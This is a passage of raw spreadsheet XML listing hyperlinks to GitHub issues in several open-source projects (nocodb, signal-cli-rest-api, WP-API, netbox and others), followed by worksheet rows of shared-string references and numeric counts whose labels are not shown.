Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nocodb/nocodb/issues/2242" TargetMode="External"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nocodb/nocodb/issues/2208" TargetMode="External"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nocodb/nocodb/issues/2014" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nocodb/nocodb/issues/1722" TargetMode="External"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nocodb/nocodb/issues/1713" TargetMode="External"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nocodb/nocodb/issues/1693" TargetMode="External"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nocodb/nocodb/issues/1662" TargetMode="External"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nocodb/nocodb/issues/856" TargetMode="External"/><Relationship Id="rId473" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Netflix/zuul/issues/169" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nocodb/nocodb/issues/725" TargetMode="External"/><Relationship Id="rId472" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Netflix/zuul/issues/13" TargetMode="External"/><Relationship Id="rId471" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/2803" TargetMode="External"/><Relationship Id="rId470" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/2758" TargetMode="External"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nocodb/nocodb/issues/1638" TargetMode="External"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nocodb/nocodb/issues/1129" TargetMode="External"/><Relationship Id="rId476" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/table" Target="../tables/table2.xml"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nocodb/nocodb/issues/985" TargetMode="External"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nocodb/nocodb/issues/880" TargetMode="External"/><Relationship Id="rId474" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing8.xml"/><Relationship Id="rId426" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/410" TargetMode="External"/><Relationship Id="rId425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/403" TargetMode="External"/><Relationship Id="rId424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/387" TargetMode="External"/><Relationship Id="rId423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/369" TargetMode="External"/><Relationship Id="rId429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/489" TargetMode="External"/><Relationship Id="rId428" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/466" TargetMode="External"/><Relationship Id="rId427" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/412" TargetMode="External"/><Relationship Id="rId422" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/242" TargetMode="External"/><Relationship Id="rId421" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/236" TargetMode="External"/><Relationship Id="rId420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/190" TargetMode="External"/><Relationship Id="rId415" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/103" TargetMode="External"/><Relationship Id="rId414" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/95" TargetMode="External"/><Relationship Id="rId413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/91" TargetMode="External"/><Relationship Id="rId412" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/19" TargetMode="External"/><Relationship Id="rId419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/187" TargetMode="External"/><Relationship Id="rId418" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/177" TargetMode="External"/><Relationship Id="rId417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/175" TargetMode="External"/><Relationship Id="rId416" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/135" TargetMode="External"/><Relationship Id="rId411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/seaweedfs/seaweedfs/issues/6576" TargetMode="External"/><Relationship Id="rId410" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/seaweedfs/seaweedfs/issues/6497" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/netbox-community/netbox/issues/18585" TargetMode="External"/><Relationship Id="rId448" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/411" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/netbox-community/netbox/issues/18447" TargetMode="External"/><Relationship Id="rId447" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/409" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/netbox-community/netbox/issues/18368" TargetMode="External"/><Relationship Id="rId446" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/330" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/netbox-community/netbox/issues/18363" TargetMode="External"/><Relationship Id="rId445" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/299" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/netbox-community/netbox/issues/18872" TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/netbox-community/netbox/issues/18845" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/netbox-community/netbox/issues/18669" TargetMode="External"/><Relationship Id="rId449" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/414" TargetMode="External"/><Relationship Id="rId440" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/221" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mastodon/mastodon/issues/33742" TargetMode="External"/><Relationship Id="rId444" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/290" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mastodon/mastodon/issues/33357" TargetMode="External"/><Relationship Id="rId443" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/229" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mastodon/mastodon/issues/33109" TargetMode="External"/><Relationship Id="rId442" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/228" TargetMode="External"/><Relationship Id="rId441" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/224" TargetMode="External"/><Relationship Id="rId437" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/91" TargetMode="External"/><Relationship Id="rId436" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/90" TargetMode="External"/><Relationship Id="rId435" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/72" TargetMode="External"/><Relationship Id="rId434" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/657" TargetMode="External"/><Relationship Id="rId439" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/166" TargetMode="External"/><Relationship Id="rId438" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/WP-API/WP-API/issues/164" TargetMode="External"/><Relationship Id="rId433" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/654" TargetMode="External"/><Relationship Id="rId432" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/630" TargetMode="External"/><Relationship Id="rId431" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/550" TargetMode="External"/><Relationship Id="rId430" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/bbernhard/signal-cli-rest-api/issues/49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34.38"/>
    <col customWidth="1" min="3" max="3" width="32.63"/>
    <col customWidth="1" min="4" max="4" width="33.13"/>
    <col customWidth="1" min="5" max="5" width="36.38"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="2" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="3" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="4" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="5" t="s">
        <v>5</v>
      </c>
      <c r="B2" s="6" t="s">
        <v>6</v>
      </c>
      <c r="C2" s="7" t="s">
        <v>7</v>
      </c>
      <c r="D2" s="8">
        <v>7.0</v>
      </c>
      <c r="E2" s="9">
        <v>120.0</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="10" t="s">
        <v>8</v>
      </c>
      <c r="B3" s="11" t="s">
        <v>6</v>
      </c>
      <c r="C3" s="12" t="s">
        <v>9</v>
      </c>
      <c r="D3" s="13">
        <v>3.0</v>
      </c>
      <c r="E3" s="14">
        <v>27.0</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="s">
        <v>10</v>
      </c>
      <c r="B4" s="6" t="s">
        <v>6</v>
      </c>
      <c r="C4" s="15" t="s">
        <v>11</v>
      </c>
      <c r="D4" s="8">
        <v>83.0</v>
      </c>
      <c r="E4" s="9">
        <v>745.0</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="16" t="s">
        <v>12</v>
      </c>
      <c r="B5" s="17" t="s">
        <v>13</v>
      </c>
      <c r="C5" s="18" t="s">
        <v>14</v>
      </c>
      <c r="D5" s="19">
        <v>1.0</v>
      </c>
      <c r="E5" s="20">
        <v>14.0</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="s">
        <v>15</v>
      </c>
      <c r="B6" s="21" t="s">
        <v>16</v>
      </c>
      <c r="C6" s="7" t="s">
        <v>17</v>
      </c>
      <c r="D6" s="8">
        <v>4.0</v>
      </c>
      <c r="E6" s="9">
        <v>76.0</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="16" t="s">
        <v>18</v>
      </c>
      <c r="B7" s="22" t="s">
        <v>13</v>
      </c>
      <c r="C7" s="12" t="s">
        <v>19</v>
      </c>
      <c r="D7" s="13">
        <v>2.0</v>
      </c>
      <c r="E7" s="14">
        <v>8.0</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="s">
        <v>20</v>
      </c>
      <c r="B8" s="23" t="s">
        <v>13</v>
      </c>
      <c r="C8" s="15" t="s">
        <v>21</v>
      </c>
      <c r="D8" s="8">
        <v>4.0</v>
      </c>
      <c r="E8" s="9">
        <v>59.0</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="16" t="s">
        <v>22</v>
      </c>
      <c r="B9" s="11" t="s">
        <v>6</v>
      </c>
      <c r="C9" s="24" t="s">
        <v>23</v>
      </c>
      <c r="D9" s="13">
        <v>11.0</v>
      </c>
      <c r="E9" s="14">
        <v>42.0</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="s">
        <v>24</v>
      </c>
      <c r="B10" s="25" t="s">
        <v>25</v>
      </c>
      <c r="C10" s="7" t="s">
        <v>26</v>
      </c>
      <c r="D10" s="8">
        <v>35.0</v>
      </c>
      <c r="E10" s="9">
        <v>482.0</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="10" t="s">
        <v>27</v>
      </c>
      <c r="B11" s="22" t="s">
        <v>13</v>
      </c>
      <c r="C11" s="24" t="s">
        <v>28</v>
      </c>
      <c r="D11" s="13">
        <v>26.0</v>
      </c>
      <c r="E11" s="14">
        <v>197.0</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="s">
        <v>29</v>
      </c>
      <c r="B12" s="23" t="s">
        <v>13</v>
      </c>
      <c r="C12" s="15" t="s">
        <v>30</v>
      </c>
      <c r="D12" s="8">
        <v>10.0</v>
      </c>
      <c r="E12" s="9">
        <v>50.0</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="10" t="s">
        <v>31</v>
      </c>
      <c r="B13" s="22" t="s">
        <v>13</v>
      </c>
      <c r="C13" s="24" t="s">
        <v>32</v>
      </c>
      <c r="D13" s="13">
        <v>55.0</v>
      </c>
      <c r="E13" s="14">
        <v>912.0</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="26" t="s">
        <v>33</v>
      </c>
      <c r="B14" s="27" t="s">
        <v>13</v>
      </c>
      <c r="C14" s="28" t="s">
        <v>34</v>
      </c>
      <c r="D14" s="29">
        <v>9.0</v>
      </c>
      <c r="E14" s="30">
        <v>51.0</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="10" t="s">
        <v>35</v>
      </c>
      <c r="B15" s="22" t="s">
        <v>13</v>
      </c>
      <c r="C15" s="24" t="s">
        <v>36</v>
      </c>
      <c r="D15" s="13">
        <v>29.0</v>
      </c>
      <c r="E15" s="14">
        <v>207.0</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="31" t="s">
        <v>37</v>
      </c>
      <c r="B16" s="32" t="s">
        <v>16</v>
      </c>
      <c r="C16" s="28" t="s">
        <v>38</v>
      </c>
      <c r="D16" s="29">
        <v>20.0</v>
      </c>
      <c r="E16" s="30">
        <v>147.0</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="10" t="s">
        <v>39</v>
      </c>
      <c r="B17" s="11" t="s">
        <v>6</v>
      </c>
      <c r="C17" s="24" t="s">
        <v>40</v>
      </c>
      <c r="D17" s="13">
        <v>8.0</v>
      </c>
      <c r="E17" s="14">
        <v>62.0</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="s">
        <v>41</v>
      </c>
      <c r="B18" s="33" t="s">
        <v>42</v>
      </c>
      <c r="C18" s="15" t="s">
        <v>43</v>
      </c>
      <c r="D18" s="8">
        <v>58.0</v>
      </c>
      <c r="E18" s="9">
        <v>1037.0</v>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="10" t="s">
        <v>44</v>
      </c>
      <c r="B19" s="11" t="s">
        <v>6</v>
      </c>
      <c r="C19" s="24" t="s">
        <v>45</v>
      </c>
      <c r="D19" s="13">
        <v>2.0</v>
      </c>
      <c r="E19" s="14">
        <v>13.0</v>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="s">
        <v>46</v>
      </c>
      <c r="B20" s="34" t="s">
        <v>6</v>
      </c>
      <c r="C20" s="15" t="s">
        <v>47</v>
      </c>
      <c r="D20" s="8">
        <v>3.0</v>
      </c>
      <c r="E20" s="9">
        <v>24.0</v>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="16" t="s">
        <v>48</v>
      </c>
      <c r="B21" s="35" t="s">
        <v>13</v>
      </c>
      <c r="C21" s="36" t="s">
        <v>49</v>
      </c>
      <c r="D21" s="19">
        <v>6.0</v>
      </c>
      <c r="E21" s="20">
        <v>36.0</v>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="s">
        <v>50</v>
      </c>
      <c r="B22" s="21" t="s">
        <v>16</v>
      </c>
      <c r="C22" s="7" t="s">
        <v>51</v>
      </c>
      <c r="D22" s="8">
        <v>3.0</v>
      </c>
      <c r="E22" s="9">
        <v>34.0</v>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="10" t="s">
        <v>52</v>
      </c>
      <c r="B23" s="37" t="s">
        <v>53</v>
      </c>
      <c r="C23" s="24" t="s">
        <v>54</v>
      </c>
      <c r="D23" s="13">
        <v>2.0</v>
      </c>
      <c r="E23" s="14">
        <v>9.0</v>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="38" t="s">
        <v>55</v>
      </c>
      <c r="B24" s="27" t="s">
        <v>13</v>
      </c>
      <c r="C24" s="39" t="s">
        <v>56</v>
      </c>
      <c r="D24" s="40">
        <v>1.0</v>
      </c>
      <c r="E24" s="41">
        <v>88.0</v>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="10" t="s">
        <v>57</v>
      </c>
      <c r="B25" s="42" t="s">
        <v>58</v>
      </c>
      <c r="C25" s="24" t="s">
        <v>59</v>
      </c>
      <c r="D25" s="13">
        <v>21.0</v>
      </c>
      <c r="E25" s="14">
        <v>146.0</v>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="s">
        <v>60</v>
      </c>
      <c r="B26" s="21" t="s">
        <v>16</v>
      </c>
      <c r="C26" s="15" t="s">
        <v>61</v>
      </c>
      <c r="D26" s="8">
        <v>6.0</v>
      </c>
      <c r="E26" s="9">
        <v>104.0</v>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="10" t="s">
        <v>62</v>
      </c>
      <c r="B27" s="43" t="s">
        <v>63</v>
      </c>
      <c r="C27" s="12" t="s">
        <v>64</v>
      </c>
      <c r="D27" s="13">
        <v>2.0</v>
      </c>
      <c r="E27" s="14">
        <v>9.0</v>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="s">
        <v>65</v>
      </c>
      <c r="B28" s="34" t="s">
        <v>6</v>
      </c>
      <c r="C28" s="15" t="s">
        <v>66</v>
      </c>
      <c r="D28" s="8">
        <v>2.0</v>
      </c>
      <c r="E28" s="9">
        <v>7.0</v>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="10" t="s">
        <v>67</v>
      </c>
      <c r="B29" s="11" t="s">
        <v>6</v>
      </c>
      <c r="C29" s="24" t="s">
        <v>68</v>
      </c>
      <c r="D29" s="13">
        <v>24.0</v>
      </c>
      <c r="E29" s="14">
        <v>140.0</v>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="s">
        <v>69</v>
      </c>
      <c r="B30" s="44" t="s">
        <v>70</v>
      </c>
      <c r="C30" s="7" t="s">
        <v>71</v>
      </c>
      <c r="D30" s="8">
        <v>63.0</v>
      </c>
      <c r="E30" s="9">
        <v>465.0</v>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="10" t="s">
        <v>72</v>
      </c>
      <c r="B31" s="43" t="s">
        <v>63</v>
      </c>
      <c r="C31" s="12" t="s">
        <v>73</v>
      </c>
      <c r="D31" s="13">
        <v>53.0</v>
      </c>
      <c r="E31" s="14">
        <v>2617.0</v>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="38" t="s">
        <v>74</v>
      </c>
      <c r="B32" s="45" t="s">
        <v>63</v>
      </c>
      <c r="C32" s="46" t="s">
        <v>75</v>
      </c>
      <c r="D32" s="8">
        <v>15.0</v>
      </c>
      <c r="E32" s="9">
        <v>494.0</v>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="10" t="s">
        <v>76</v>
      </c>
      <c r="B33" s="47" t="s">
        <v>70</v>
      </c>
      <c r="C33" s="24" t="s">
        <v>77</v>
      </c>
      <c r="D33" s="13">
        <v>2.0</v>
      </c>
      <c r="E33" s="14">
        <v>12.0</v>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="s">
        <v>78</v>
      </c>
      <c r="B34" s="48" t="s">
        <v>70</v>
      </c>
      <c r="C34" s="15" t="s">
        <v>79</v>
      </c>
      <c r="D34" s="8">
        <v>7.0</v>
      </c>
      <c r="E34" s="9">
        <v>99.0</v>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="10" t="s">
        <v>80</v>
      </c>
      <c r="B35" s="49" t="s">
        <v>42</v>
      </c>
      <c r="C35" s="12" t="s">
        <v>81</v>
      </c>
      <c r="D35" s="13">
        <v>67.0</v>
      </c>
      <c r="E35" s="14">
        <v>838.0</v>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="s">
        <v>82</v>
      </c>
      <c r="B36" s="34" t="s">
        <v>6</v>
      </c>
      <c r="C36" s="7" t="s">
        <v>83</v>
      </c>
      <c r="D36" s="8">
        <v>46.0</v>
      </c>
      <c r="E36" s="9">
        <v>391.0</v>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="50" t="s">
        <v>84</v>
      </c>
      <c r="B37" s="51" t="s">
        <v>58</v>
      </c>
      <c r="C37" s="52" t="s">
        <v>85</v>
      </c>
      <c r="D37" s="53">
        <v>1.0</v>
      </c>
      <c r="E37" s="54">
        <v>9.0</v>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="s">
        <v>86</v>
      </c>
      <c r="B38" s="23" t="s">
        <v>13</v>
      </c>
      <c r="C38" s="15" t="s">
        <v>87</v>
      </c>
      <c r="D38" s="8">
        <v>16.0</v>
      </c>
      <c r="E38" s="9">
        <v>26.0</v>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="10" t="s">
        <v>88</v>
      </c>
      <c r="B39" s="49" t="s">
        <v>42</v>
      </c>
      <c r="C39" s="12" t="s">
        <v>89</v>
      </c>
      <c r="D39" s="13">
        <v>58.0</v>
      </c>
      <c r="E39" s="14">
        <v>391.0</v>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="s">
        <v>90</v>
      </c>
      <c r="B40" s="23" t="s">
        <v>13</v>
      </c>
      <c r="C40" s="15" t="s">
        <v>91</v>
      </c>
      <c r="D40" s="8">
        <v>3.0</v>
      </c>
      <c r="E40" s="9">
        <v>25.0</v>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="16" t="s">
        <v>92</v>
      </c>
      <c r="B41" s="49" t="s">
        <v>42</v>
      </c>
      <c r="C41" s="24" t="s">
        <v>93</v>
      </c>
      <c r="D41" s="13">
        <v>28.0</v>
      </c>
      <c r="E41" s="14">
        <v>90.0</v>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="s">
        <v>94</v>
      </c>
      <c r="B42" s="34" t="s">
        <v>6</v>
      </c>
      <c r="C42" s="15" t="s">
        <v>95</v>
      </c>
      <c r="D42" s="8">
        <v>11.0</v>
      </c>
      <c r="E42" s="9">
        <v>57.0</v>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="10" t="s">
        <v>96</v>
      </c>
      <c r="B43" s="55" t="s">
        <v>16</v>
      </c>
      <c r="C43" s="12" t="s">
        <v>97</v>
      </c>
      <c r="D43" s="13">
        <v>7.0</v>
      </c>
      <c r="E43" s="14">
        <v>18.0</v>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="38" t="s">
        <v>98</v>
      </c>
      <c r="B44" s="27" t="s">
        <v>13</v>
      </c>
      <c r="C44" s="39" t="s">
        <v>99</v>
      </c>
      <c r="D44" s="40">
        <v>9.0</v>
      </c>
      <c r="E44" s="41">
        <v>36.0</v>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="10" t="s">
        <v>100</v>
      </c>
      <c r="B45" s="55" t="s">
        <v>16</v>
      </c>
      <c r="C45" s="24" t="s">
        <v>101</v>
      </c>
      <c r="D45" s="13">
        <v>1.0</v>
      </c>
      <c r="E45" s="14">
        <v>62.0</v>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="s">
        <v>102</v>
      </c>
      <c r="B46" s="44" t="s">
        <v>70</v>
      </c>
      <c r="C46" s="15" t="s">
        <v>103</v>
      </c>
      <c r="D46" s="8">
        <v>7.0</v>
      </c>
      <c r="E46" s="9">
        <v>31.0</v>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="10" t="s">
        <v>104</v>
      </c>
      <c r="B47" s="47" t="s">
        <v>70</v>
      </c>
      <c r="C47" s="12" t="s">
        <v>105</v>
      </c>
      <c r="D47" s="13">
        <v>1.0</v>
      </c>
      <c r="E47" s="14">
        <v>68.0</v>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="s">
        <v>106</v>
      </c>
      <c r="B48" s="33" t="s">
        <v>42</v>
      </c>
      <c r="C48" s="15" t="s">
        <v>107</v>
      </c>
      <c r="D48" s="8">
        <v>1.0</v>
      </c>
      <c r="E48" s="9">
        <v>5.0</v>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="10" t="s">
        <v>108</v>
      </c>
      <c r="B49" s="55" t="s">
        <v>16</v>
      </c>
      <c r="C49" s="24" t="s">
        <v>109</v>
      </c>
      <c r="D49" s="13">
        <v>10.0</v>
      </c>
      <c r="E49" s="14">
        <v>126.0</v>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="38" t="s">
        <v>110</v>
      </c>
      <c r="B50" s="44" t="s">
        <v>70</v>
      </c>
      <c r="C50" s="7" t="s">
        <v>111</v>
      </c>
      <c r="D50" s="8">
        <v>26.0</v>
      </c>
      <c r="E50" s="9">
        <v>478.0</v>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="16" t="s">
        <v>112</v>
      </c>
      <c r="B51" s="42" t="s">
        <v>25</v>
      </c>
      <c r="C51" s="12" t="s">
        <v>113</v>
      </c>
      <c r="D51" s="13">
        <v>37.0</v>
      </c>
      <c r="E51" s="14">
        <v>115.0</v>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="s">
        <v>114</v>
      </c>
      <c r="B52" s="23" t="s">
        <v>13</v>
      </c>
      <c r="C52" s="15" t="s">
        <v>115</v>
      </c>
      <c r="D52" s="8">
        <v>2.0</v>
      </c>
      <c r="E52" s="9">
        <v>14.0</v>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="56"/>
      <c r="B53" s="56"/>
      <c r="C53" s="56"/>
      <c r="D53" s="57"/>
      <c r="E53" s="57"/>
    </row>
    <row r="54">
      <c r="A54" s="56"/>
      <c r="B54" s="56"/>
      <c r="C54" s="56"/>
      <c r="D54" s="57"/>
      <c r="E54" s="57"/>
    </row>
    <row r="55">
      <c r="A55" s="56"/>
      <c r="B55" s="56"/>
      <c r="C55" s="56"/>
      <c r="D55" s="57"/>
      <c r="E55" s="57"/>
    </row>
    <row r="56">
      <c r="A56" s="56"/>
      <c r="B56" s="56"/>
      <c r="C56" s="56"/>
      <c r="D56" s="57"/>
      <c r="E56" s="57"/>
    </row>
    <row r="57">
      <c r="A57" s="56"/>
      <c r="B57" s="56"/>
      <c r="C57" s="56"/>
      <c r="D57" s="57"/>
      <c r="E57" s="57"/>
    </row>
    <row r="58">
      <c r="A58" s="56"/>
      <c r="B58" s="56"/>
      <c r="C58" s="56"/>
      <c r="D58" s="57"/>
      <c r="E58" s="57"/>
    </row>
    <row r="59">
      <c r="A59" s="56"/>
      <c r="B59" s="56"/>
